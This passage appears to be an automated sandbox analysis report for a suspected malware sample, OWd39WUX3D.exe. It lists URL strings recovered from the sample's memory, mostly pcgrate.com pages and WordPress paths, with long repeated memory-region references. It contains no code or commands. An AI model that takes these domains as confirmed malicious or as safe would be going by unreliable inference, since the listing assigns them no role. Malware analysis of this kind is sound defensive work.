              Source: OWd39WUX3D.exe, 00000000.00000003.393036603.0000000006B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/q
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ottospm.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ozs.si/o-zbornici
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pb-games.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/100x100-px-1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 